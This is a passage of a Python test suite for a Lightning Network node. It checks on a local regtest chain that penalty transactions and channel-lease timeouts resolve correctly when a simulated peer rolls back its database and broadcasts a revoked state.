l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind):
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1csv lock one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': coin_mvt_plugin,
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that 1 + 4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv['payment_hash']))
# l2 moves on for closed l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
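# The penalty tests above and below both snapshot l2's sqlite3 database and
# later roll it back, forcing a revoked state onto the chain.  A minimal
# sketch of that pattern as helpers (hypothetical, not used by the tests;
# relies on the module-level os/copyfile imports and assumes the node is
# stopped around each call):
def snapshot_node_db(node, chainparams):
    """Copy the node's lightningd.sqlite3 aside and return the backup path."""
    db = os.path.join(node.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
    bak = db + '.bak'
    copyfile(db, bak)
    return bak


def rollback_node_db(node, chainparams, bak):
    """Overwrite the node's lightningd.sqlite3 with an earlier snapshot."""
    db = os.path.join(node.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
    copyfile(bak, db)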
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
    the blockchain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
    l3 comes back online, sees l2's cheat and takes funds from the htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
    # push some money so that l1 + l4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
